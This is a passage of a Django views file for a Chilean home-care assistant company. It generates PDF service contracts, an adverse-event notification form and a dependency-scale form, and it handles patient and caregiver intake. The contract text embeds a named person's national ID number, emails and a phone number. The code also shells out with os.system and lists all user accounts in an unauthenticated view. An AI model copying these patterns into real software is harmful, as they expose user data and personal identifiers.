Antonio Castillo Rojas, CI: 13.477.178-K \")\n\tc.drawString(30,570,\"ubicada en calle El Olivillo 6036, Peñalolen, email: contacto@asistencia integral.cl, fono: 22 408 85 91\")\n\tc.drawString(30,555,\"(Oficina comercial Avenida Quilin 3451, comuna de Macul) a quien se denominará como 'Prestador\")\n\tc.drawString(30,540,\"de servicios' bajo los términos y condiciones siguientes:\")\n\tc.drawString(30,520,\"PRIMERO: El cliente conviene contratar por voluntad propia al Prestador de Servicios para el cuidado\")\n\tc.drawString(30,505,\"del Señor (a,ta): \"+paciente.nombre+\" CI:\"+paciente.rut+\" actual paciente de\")\n\tc.drawString(30,505,\"del Señor (a,ta): \"+paciente.nombre+\" CI:\"+paciente.rut+\" actual paciente de\")\n\tc.drawString(30,490,paciente.n_apod+\", este servicio deberá prestarse en forma independiente y autonoma\")\n\tc.drawString(30,475,\"asumiendo riesgos y responsabilidades propias de la actividad. El servicio basicamente consistirá en\")\n\tc.drawString(30,460,\"que los asistentes contratados por el Prestador de Servicios asistan al paciente, que por orden\")\n\tc.drawString(30,445,\"médica lo requiera y que se encuentre internado(a) en la institución de salud acreditada, en sus\")\n\tc.drawString(30,430,\"necesidades básicas, tales como aseo personal, alimentación, vestuario, deambulación y compañia.\")\n\tc.drawString(30,405,\"SEGUNDO: Las actividades de los Asistentes de Enfermos del Prestador de Servicios se efectuarán \")\n\tc.drawString(30,390,\"en : \"+paciente.localizacion+\"\")\n\tc.drawString(30,365,\"TERCERO: Este contrato se celebra entre el Cliente y el prestador de Servicios por cuanto los\")\n\tc.drawString(30,350,\"Asistentes no tendrán relacion de tipo Empleador a Trabajador con los Clientes. No obstante, estos\")\n\tc.drawString(30,335,\"últimos se comprometen a cancelar lo siguiente:\")\n\tc.drawString(30,310,\"Paciente de baja complejidad:\")\n\t#\n\tc.drawString(30,285,\"-Turno diurno $ 28.000.- Lunes a Sabado de 8:00 a 20:00 Hrs. (Día Hábil)\")\n\tc.drawString(30,270,\"-Turno Nocturno $ 30.000.- Lunes a Sabado de 20:00 a 8:00 Hrs. (Día Hábil)\")\n\tc.drawString(30,255,\"-Domingo y feriados Diurnos $ 42.000.-\")\n\tc.drawString(30,240,\"-Domingo y visperas de Feriado Nocturno $ 45.000.-\")\n\tc.drawString(30,225,\"-Medio turno individual 8:00 a 14:00 ó 14:00 a 20:00 Hrs. $ 15.000.-\")\n\t#\n\tc.drawString(30,200,\"Abono Inicial: El cliente deberá abonar los primeros 4 a 6 turnos, que corresponden a 48 o 72 horas\")\n\tc.drawString(30,185,\"y cada turno equivale a 12 horas continuas, estos valores seran abonados y rebajados del primer\")\n\tc.drawString(30,170,\"cobro semanal del cliente.\")\n\n\t#Grabamos la página presente del canvas\n\tc.showPage() #salto de pagina\n\t#\n\t## COMIENZA SEGUNDA PAGINA ###\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\t#if paciente.abono_inicial != 0 and paciente.abono_inicial != None:\n\tif valor_abono != 0 and valor_abono != None:\n\t\t#return HttpResponse(\"Abono inicial es distinto de cero: \"+str(paciente.abono_inicial))\n\t\tc.drawString(30,660, \"Monto abono $: \"+str(valor_abono)+\" Forma de pago: \"+abon_x)\n\t\tcol = 600\n\t\t#if cheque_x != \"\" or cheque_x != None:\n\t\tif abon_x != \"Efectivo\":\t\n\t\t\tc.drawString(30,645, \"Cheque número.....: \"+str(cheque_x)+\" de fecha :\"+str(fe_che))\n\t\t\tc.drawString(30,630, \"Banco.............: \"+banco_x.strip())\n\t\t\t#col = 600 # inhibido el 19042020\n\telse:\n\t\tc.drawString(30,660, \"** No registra Abono inicial **\")\n\t\tcol = 630\n\n\tc.drawString(30,col, \"Por otra parte, el Prestador, deberá emitir de manera individualizada y detallada el COBRO DE LOS\")\n\tcol = col - 15\n\tc.drawString(30,col, \"SERVICIOS DE CUIDADOS POR PERIODOS SEMANALES O EN MENOR PLAZO QUE SE REQUIERA,\")\n\tcol = col - 15\n\tc.drawString(30,col, \"siendo responsabilidad del Cliente la INMEDIATA CANCELACION por cada informe emitido, pudiendo\")\n\tcol = col - 15\n\tc.drawString(30,col, \"solicitar la boleta una vez cancelados los servicios, acordando un plazo no superior a un dia posterior\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"a la emision del respectivo documento, el no cumplimiento a lo establecido resultará en la suspensión\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"automática del servicio, como así en los casos de atrasos y reposición de mas de una oportunidad,\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"darán cabida al término del presente contrato.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"Se deja constancia que los plazos de cancelación del presente contrato NO guardan relación alguna\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"con los establecidos por la institucion médica del paciente, por cuanto Asistencia integral es una\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"empresa de tipo externa a la cual puede contactar directamente en caso de dificultades, dudas o \")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"agradecimientos.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"CUARTO: son obligaciones del Prestador de Servicios, las siguientes:\")\n\tcol = col - 15\n\tc.drawString(40,col, \"a) Realizar los servicios de acuerdo a lo establecido en la clausula primera de este contrato\")\n\tcol = col - 15\n\tc.drawString(40,col, \" En forma eficiente. \")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"b) Guardar el secreto sobre los datos proporcionados por Los Clientes y sobre aquellos que\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" conozca en el desempeño de las funciones.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"c) Contar con los Asistentes necesarios para una opoprtuna prestación del servicio.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"d) Que los asistentes cuenten con un uniforme que los distinga del personal de la institución\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" prestadora del servicio medico del paciente.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"e) Que los asistentes cuenten con una credencial que los identifique claramente.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"f) Disponer de un uniforme si el cliente lo requiere.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"QUINTO: Son obligaciones del Cliente, las siguientes:\")\n\tcol = col - 15\n\tc.drawString(40,col, \"a) Abonar al Prtestador de Servicios la retribución en la forma acordada, conforme a la oportuna\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" facturación realizada por este.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"b) Informar oportunamente al Prestador respecto de cualquier tipo de dificultad que hubiere entre el \")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" Cliente o el paciente y el Asistente de Enfermos.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"c) Respetar los conductos regulares de la institución prestadora del servicio médico del paciente\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" frente a la entrega de artículos personales, artículos de higiene, dinero\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" o cualquier otro efecto del paciente.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"d) Dar aviso en forma inmediata frente a la orden medica de cese de actividades por parte del\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" Asistente de enfermos via email a contacto@asistenciaintegral.cl\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"e) Ante las dificultades, dirigirse con el o la supervisora de turno correspondiente a la\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" la empresa de asistentes de enfermos a fin de exponer y dar pronta solución ante eventuales\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" requerimientos.\")\n\n\n\tc.showPage() #salto de pagina #################################################\n\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\n\tcol = 660\n\tc.drawString(40,col, \"f) Ante felicitaciones o sugerencias hacerlas llegar por escrito a acastillo@asistenciaintegral.cl\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"SEXTO: La duración del presente contrato será del tiempo necesario requerido por la Orden Médica,\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"pudiendo a su vencimiento, ser objeto de renovación frente a los requerimientos del paciente,\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"médico o Cliente, para tal efecto previamente deberá existir un aviso por medio de la enfermera\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"o paramédico del pabellón de la institución en que se encuentre el paciente, adicionando el aviso\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"correspondiente de aprobación por parte del Cliente via email a contacto@asistenciaintegral.cl\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"SPTIMO: Para los efectos en la interpretación respecto del presente Contrato de prestación de\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"Servicios, las partes establecen que la juridicción de lo tribunales ordinarios corresponderán\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"a los con asiento en la ciudad de Santiago.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"Al mismo tiempo el Cliente autoriza a Asistencia Integral Limitada, RUT:76.191.893-1 para que\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"en el evento de mora, simple retardo o incumplimiento, en el total o parte de las cancelaciones \")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"antes indicadas, los datos personales y los relativos a este incumplimiento se traten y/o comuniquen\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"en la base de datos DICOM, como asi mismo su cobro sea transferido a la empresa de cobranza en\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"convenio.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"OCTAVO: Para constancia y en señal de plena conformidad de los acuerdos establecidos en el\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"presente contrato, firman el prestador de servicios y el cliente respectivamente, en dos\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \" ejemplares pudiendo quedar uno en poder de cada interesado-.\")\n\n\t# rectangulo\n\tcol = col - 150\n\tc.rect(460, col, 80, 90)\n\tc.drawString(475,col-15, \"(Huella)\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"Asistencia Integral Ltda.-. _______________________\")\n\tcol = col - 15\n\tc.drawString(30,col, \" GERENCIA Nombre:\")\n\tcol = col - 15\n\tc.drawString(30,col, \" RUT:76.191.893-1 CI:\")\n\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\t#response = HttpResponse(content_type='application/pdf')\n\n\t# produccion\n\t#return FileResponse(open(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, 'rb'), content_type='application/pdf')\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\tresponse['Content-Disposition'] = 'attachment; filename='+nom_arch\n\tvariable1 = 'Despliegue de Pacientes'\n\tpaciente = Pacientes.objects.all().order_by('nombre')\n\tfalso_x = False # paciente HABILITADO - DESHABILITADO \n\tcontext = {\t\"pacientes\":paciente,\"falso_x\":falso_x,\"variable1\":variable1,}\n\treturn render(request,'grid_pacientes.html',context)\n\ndef siexisterut(request):\n\tvariable1 = 'Pantalla de prueba para implementar AJAX'\n\tresultado = ''\n\tpaciente = Pacientes # modelo\n\tform \t = PacientesForm(request.GET or None) # formulario\n\tif request.method == 'POST':\n\t\tresultado = 'noexiste'\t\t\n\t\trut_x = request.POST.get('rut') \n\t\texiste = paciente.objects.filter(rut=rut_x).exists()\n\t\tif existe == True:\n\t\t\tresultado = 'existe'\n\t\telse:\n\t\t\tresultado = 'noexiste'\n\t\n\tcontext = {\n\t\t\"resultado\":resultado,\n\t\t\"form\":form,\n\t\t\"variable1\":variable1,\n\t\t}\t\t\n\t#return render(request,'NuevoPac2.html',context)\n\n\ndef NuevoPac2(request):\n\tvariable1 = 'Ingresando nuevo paciente'\n\tvariable2 = ''\n\tresultado = False\n\tfechahoy = datetime.now()\t\t\n\tmes_numerico = fechahoy.month \n\tano_hoy = fechahoy.year\t\t\n\tnuevo_pac = 1\t# sw para mostrar el boton q' despliega los listados a generar\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\tcob = Param.objects.filter(tipo='COBR').order_by('codigo')\n\tclasi = Param.objects.filter(tipo='PROC').order_by('codigo')\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo')\n\tyace\t= Param.objects.filter(tipo='YACE').order_by('-valor1')\n\tecivil\t= Param.objects.filter(tipo='ECIVI')\t\n\tprevi\t= Param.objects.filter(tipo='PREVI')\t\n\tform \t= PacientesForm(request.POST or None)\n\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'region':region,\n\t\t'comuna':comuna,\n\t\t'sexo':sexo,\n\t\t'cob':cob,\n\t\t'clasi':clasi,\n\t\t'abon':abon,\n\t\t'nuevo_pac':nuevo_pac,\n\t\t'yace':yace,\n\t\t'resultado':resultado,\n\t\t'car_doc_cobro':\"3\",\n\t\t'previ':previ,\n\t\t'ecivil':ecivil,\t\n\t\t}\n\n\tif request.method == \"POST\":\n\t\tpaciente = Pacientes # modelo\n\t\trut_x = request.POST.get('rut') # valor del template\n\t\tresultado = paciente.objects.filter(rut=rut_x).exists() # devuelte un true o false\n\t\tregistro = paciente.objects.filter(rut=rut_x) # devuelve el registro del paciente\n\t\tfor dato in registro:\n\t\t\tid_x = dato.id\n\t\t\tnom_x = dato.nombre\n\n\t\tif resultado==False:\n\t\t\treturn render(request,'ficha_pacientes.html',context)\n\t\telse:\n\t\t\tvariable2 = \"Paciente: \"+nom_x+\", ya existe !!\"\t\n\t\t\tcontext = {\n\t\t\t\t'form':form,\n\t\t\t\t'variable1':variable1,\n\t\t\t\t'variable2':variable2,\n\t\t\t\t'resultado':resultado,\n\t\t\t\t'nuevo_pac':nuevo_pac,\n\t\t\t\t'id_x':id_x,\n\t\t\t\t'rut_x':rut_x,}\n\treturn render(request, 'NuevoPac2.html',context)\n\n\ndef NuevoCui3(request):\n\tvariable1 = 'Agregando nueva ficha de cuidador'\n\tvariable2 = \"modifica_rut\"\n\tresultado = False\n\terror_new = \"ok\"\n\tfechahoy = datetime.now()\t\t\n\tmes_numerico = fechahoy.month \n\tano_hoy = fechahoy.year\t\t\n\tnuevo_cui = 1\t# nuevo\n\tid_x = 1\t# para que no grite\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\tcob = Param.objects.filter(tipo='COBR').order_by('codigo')\n\tclasi = Param.objects.filter(tipo='PROC').order_by('codigo')\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo')\n\tyace\t= Param.objects.filter(tipo='YACE').order_by('-valor1')\n\ttipo = Param.objects.filter(tipo='CONTR').order_by('codigo') # Contratado - honorarios\n\tinstr\t= Param.objects.filter(tipo='INSTR').order_by('codigo')\n\tecivil\t= Param.objects.filter(tipo='ECIVI')\t\n\tprevi\t= Param.objects.filter(tipo='PREVI')\t\n\tform \t= CuidadoresForm(request.POST or None)\n\n\tif request.method == \"POST\":\n\t\tvariable2 = \"nomodifica_rut\"\n\t\tcuidador = Cuidadores # modelo\n\t\trut_x = request.POST.get('rut') # valor del template\n\t\textran = request.POST.get('extran') # valor del template\n\t\tresultado = cuidador.objects.filter(rut=rut_x).exists() # devuelte un true o false\n\t\tregistro = cuidador.objects.filter(rut=rut_x) # devuelve el registro del paciente\n\t\tfor dato in registro:\n\t\t\tid_x = dato.id\n\t\t\tnom_x = dato.nombre\n\n\t\tcuidador.extran = 0 \n\n\t\tcontext = {\n\t\t\t'form':form,\n\t\t\t'variable1':variable1,\n\t\t\t'variable2':variable2,\n\t\t\t'region':region,\n\t\t\t'comuna':comuna,\n\t\t\t'sexo':sexo,\n\t\t\t'tipo':tipo,\n\t\t\t'clasi':clasi,\n\t\t\t'instr':instr,\n\t\t\t'nuevo_cui':nuevo_cui,\n\t\t\t'error_new':error_new,\n\t\t\t'extran':extran,\n\t\t\t}\n\n\t\tif resultado==False:\t# si existe o no\n\t\t\treturn render(request,'ficha_cuidadores.html',context) # si no existe, muestra plantilla en blanco\n\t\telse:\n\t\t\tvariable2 = nom_x+\", ya existe !!\"\t\n\t\t\t#return render(request,'ficha_cuidadores.html',context)\n\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'resultado':resultado,\n\t\t'id_x':id_x,\t\t\t\t\n\t\t}\n\treturn render(request, 'NuevoCui3.html',context)\n\n\ndef grid_cheques(request):\n\tvariable1 = 'Listado de cheques'\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\t#\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\t#\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\tmes_numerico = fechahoy.month # mes en numero\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\n\tif request.method == \"POST\":\n\t\tmes_hoy = request.POST.get('meses') # valor viene del template\n\t\tano_hoy = request.POST.get('ano')\t # valor viene del template como aaaa\n\t\tano_hoy = int(ano_hoy) # para que funcione el combo debe ser INT()\n\t\tmes_numerico = meses.index(mes_hoy) + 1 # entrega el numerico del mes\n\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] #total dias del mes\n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\tbanco\t= Param.objects.filter(tipo='BCO').order_by('descrip')\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo') # Efec,Cheq,Tarj\n\tpaciente = Pacientes.objects.all().order_by('nombre')\n\n\tcuenta = 0\n\t\n\tcheques = Anticipos.objects.filter(fecha_cheque__range=(fecha_ini,fecha_fin),\n\t\tabon=2).exclude(fecha_cheque__exact=None).order_by('fecha_cheque')\n\n\t#cheques = Anticipos.objects.filter(fecha_cheque__range=(fecha_ini,fecha_fin),\n\t#\tabon=2).exclude(fecha_cheque__exact=None).order_by('fecha_cheque').select_related()\n\n\t#return HttpResponse(\"El nombre es: \"+cheques.Pacientes.nombre)\n\n\t#cheques = Anticipos.objects.select_related()\n\t\n\tfor ch in cheques:\n\t\tcuenta = cuenta + 1\n\n\tcontext = {\n\t\t'cheques':cheques,\n\t\t'variable1':variable1,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"dia_hoy\":dia_hoy,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"logo_excel\":logo_excel,\n\t\t\"mes_numerico\":mes_numerico,\n\t\t\"banco\":banco,\n\t\t\"abon\":abon,\n\t\t\"paciente\":paciente,\n\t\t\"cuenta\":cuenta,}\n\treturn render(request,'grid_cheques.html',context)\n\n# PARA ESTUDIO\n#sql_usuarios = \"\"\"select u.id, u.username,u.first_name,u.last_name from auth_user_groups aug\n# join auth_user u on u.id = aug.user_id\n# join auth_group ag on ag.id = aug.group_id\n# where not ag.name ='ciudadano' and u.is_superuser = False and u.is_active = True\n# group by u.id ,username, first_name, last_name, email,is_active\n# order by u.username;\"\"\"\n# \n#\tusuarios = User.objects.raw(sql_usuarios)\n# fin PARA ESTUDIO \n\n\ndef grid_login(request):\n\tvariable1 = 'Login de usuarios del Sistema'\n\t#cursor = connection.cursor() #es necesario: from django.db import connection\n\t#sql_usuarios = \"\"\"select * from auth_user order by username;\"\"\"\n\tsql_usuarios = \"select * from auth_user order by username;\"\n\tuserlog = User.objects.raw(sql_usuarios)\n\tcuenta = 0\n\tfor lg in userlog:\n\t\tcuenta = cuenta + 1\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"cuenta\":cuenta,\n\t\t\"userlog\":userlog,}\n\treturn render(request,'grid_login.html',context)\n\n\n@login_required(login_url='login_ini')\ndef axo3(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612\t\n\tnom_arch = \"axo3\"+nombrearch()+\".pdf\"\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t# ######### COMIENZA EL REPORTE ########\t\t\n ## comienza primera pagina #########\n\ty = 710\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\ty = 690\n\tc.drawString(148,y, \"Anexo 3: Formulario de Notificación de Eventos Adversos (EA)\")\n\ty = y - 15\n\tc.drawString(200,y, \"Pacientes con Cuidadora en Domicilio\")\n\ty = y - 40\n\tc.drawString(35,y, \"1.- Datos del evento:\")\n\n\tdata = [\n\t\t[\"Nombre completo del paciente\",paciente,\"R.U.T.:\",rut_aux],\n\t\t[\"fecha de notificacion\",\" \",\"Fecha evento:\",\" \"],\n\t\t[\"Lugar en el que ocurre\",\" \",\"Hora:\", \" \"],\n\t]\n\n\tt = Table(data, rowHeights=35, repeatCols=1)\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) # w=475, h=105 \n\tt.drawOn(c, 50, alto - (h + 180), 0) # alto=792, ancho=612\n\n\t## SEGUNDA TABLA ####################\n\t#y = w \n\ty = 475\n\tc.drawString(35,y, \"2.- Tipo de evento:\")\n\n\ty = y - 30 # y=429\n\tc.drawString(50,y, \"Ambito: Atención y cuidados de pacientes con servicio de cuidadora a domicilio\")\n\tespacio = \" \"\n\tdata = [\n\t\t[\"Caidas\",espacio],\n\t\t[\"Úlceras por presión\",espacio],\n\t\t[\"Salida accidental de dispositivo invasivo\",espacio],\n\t\t[\"Error de medicacion (error u omisión o falta de stock)\",espacio],\n\t\t]\n\n\tt2 = Table(data, rowHeights=35, repeatCols=1)\n\n\tt2.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t2.wrap(100, 100) # h=140, w=475 \n\t\n\t#y = y - 15 # 414\n\t#c.drawString(35,y, \"ordenada h=\"+str(h)+\" w=\"+str(w)+\" y=\"+str(y))\n\n\th = h + 190 # 330 ultima ordenada de objeto grid\n\tt2.drawOn(c, 50, alto - (h + 180), 0)\n\n\ty = 250\n\tc.drawString(35,y, \"3.- Descripción del evento ocurrido:\")\n\t#c.drawString(35,y, \"ordenada h=\"+str(h)+\" w=\"+str(w)+\" y=\"+str(y))\n\tabcisa = 50\n\ty = 226\n\n\ti=1\n\twhile i < 6:\n\t\tc.line(abcisa, y, abcisa + 450, y)\n\t\ty = y - 30\n\t\ti+=1\n\n\tc.drawString(50,y,\"Responsable de la notificación:___________________________________________\")\n\ty = y - 30\n\tc.drawString(230,y, \"Dirección Médica Nacional\")\n\n\t## ######## FIN DEL REPORTE #########\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\tresponse['Content-Disposition'] = 'attachment; filename='+nom_arch\n\tvariable1 = 'Despliegue de Pacientes'\n\tpaciente = Pacientes.objects.all().order_by('nombre')\n\tfalso_x = False # paciente HABILITADO - DESHABILITADO \n\tcontext = {\t\"pacientes\":paciente,\"falso_x\":falso_x,\"variable1\":variable1,}\n\treturn render(request,'grid_pacientes.html',context)\n\n\n@login_required(login_url='login_ini')\ndef testdelta(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612\t\n\tnom_arch = \"delta\"+nombrearch()+\".pdf\"\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\t\n ## #####################################comienza primera pagina #########\n\ty = 710\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\ty = 690\n\tc.drawString(50,y, \"TEST DELTA\")\n\ty = y - 30\n\tc.drawString(50,y,\"Paciente: \"+str(paciente)+\", RUT: \"+rut_aux)\n\t\n\t# AQUI VA LA GRID\n\tdata = [\n\t\t[\"Test Delta\",\"Puntaje\",\" \"],\n\t\t[\"Válido\",\"0 a 1\",\" \"],\n\t\t[\"Asistido leve\",\"2 a 9 \",\" \"],\n\t\t[\"Asistido moderado\",\"10 a 19\",\" \"],\n\t\t[\"Asistido severo\",\"20 a 30\",\" \"],\n\t]\n\n\t#t = Table(data, colWidths=[285,285],rowHeights=35, repeatCols=0)\n\tt = Table(data, colWidths=[100,60,80])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) \n\n\t#t.drawOn(c, 50, alto - (h + 145), 0)\t# h=90 \n\tt.drawOn(c, 50, 557, 0) # alto=792, h=90\n\n\ty = 555 - 16\n\tc.drawString(35,y, \"1.-MOVILIZACION:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Autónomo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Asistencia ocacional para la movilizacion desde la cama, WC, silla o silla de ruedas\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Precisa ayuda frecuente para la movilización desde la cama, WS, silla o silla de ruedas\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) La ayuda es necesaria en forma permanente\")\n\n\ty=y-30\n\tc.drawString(35,y, \"2.- DEAMBULACION Y DESPLAZAMIENTO:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Autónomo, aunque lleva algun medio de apoyo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Necesita ayuda esporádica\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Precisa ayuda con frecuencia para la deambulación\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Hay que desplazarse siemnpre. Incapaz de impulsar la silla de ruedas.Encamado\")\n\n\ty=y-30\n\tc.drawString(35,y, \"3.- ASEO:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Autónomo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Precisa ayuda ocacional en el aseo diario:lavado de manos, cara, afeitado, peinado, 